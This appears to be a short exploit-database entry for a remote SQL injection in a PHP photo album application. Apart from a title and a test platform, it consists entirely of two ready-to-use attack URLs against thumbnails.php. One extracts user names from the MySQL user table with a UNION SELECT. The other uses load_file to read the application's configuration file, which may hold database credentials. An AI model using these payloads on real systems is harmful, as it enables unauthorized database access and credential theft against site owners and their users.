8 lines
300 B
Text
Executable file
8 lines
300 B
Text
Executable file
# Title: PHPhotoalbum Remote sql injection Vulnerability
|
|
# Tested on: windows
|
|
|
|
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--
|
|
|
|
|
|
|
|
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--
|